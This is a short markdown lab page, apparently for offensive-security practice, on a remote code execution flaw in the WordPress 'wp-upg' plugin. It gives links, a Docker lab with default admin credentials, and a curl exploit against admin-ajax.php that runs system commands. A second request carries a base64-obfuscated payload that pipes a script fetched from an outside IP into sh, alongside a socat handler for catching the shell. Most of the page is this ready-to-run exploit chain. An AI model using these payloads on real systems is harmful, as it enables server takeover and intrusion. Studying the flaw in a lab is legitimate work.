# OffenSkill Doc

## All cool links

https://gitlab.com/TheLaluka/poc-wordpress-plugin-elementor
https://github.com/advisories/GHSA-7gm9-w486-54r3
https://wpscan.com/plugins
https://wpscan.com/plugin/wp-upg
https://wpscan.com/vulnerability/8f982ebd-6fc5-452d-8280-42e027d01b1e
https://github.com/gupta977/wp-upg
https://github.com/gupta977/wp-upg/tree/2.19
https://wordpress.org/support/topic/when-will-the-plugin-be-available-again-and-is-it-safe-to-use/
https://templates.nuclei.sh/templates#poc-wp

## Lab & POC

Install Doc: https://github.com/nezhar/wordpress-docker-compose

- Wordpress: http://127.0.0.1/
- admin:adminadmin

```bash
# Setup, might require one restart for first time
docker-compose up --build --force-recreate --remove-orphans
# RCE with
curl -i 'http://127.0.0.1/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:id:NULL:NULL'
# Cleaner with
## Host handler
cd /opt/pty4all; ipa; ./socat-multi-handler.sh --lhost 159.223.5.230 --lport 9098 --webport 9999
## Payload
curl -i 'http://127.0.0.1/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:echo+Y3VybCAxNTkuMjIzLjUuMjMwOjk5OTl8c2gK|base64+-d|sh:NULL:NULL'
## Nuclei check
nuclei -u "http://127.0.0.1/" -t nuclei-template
```

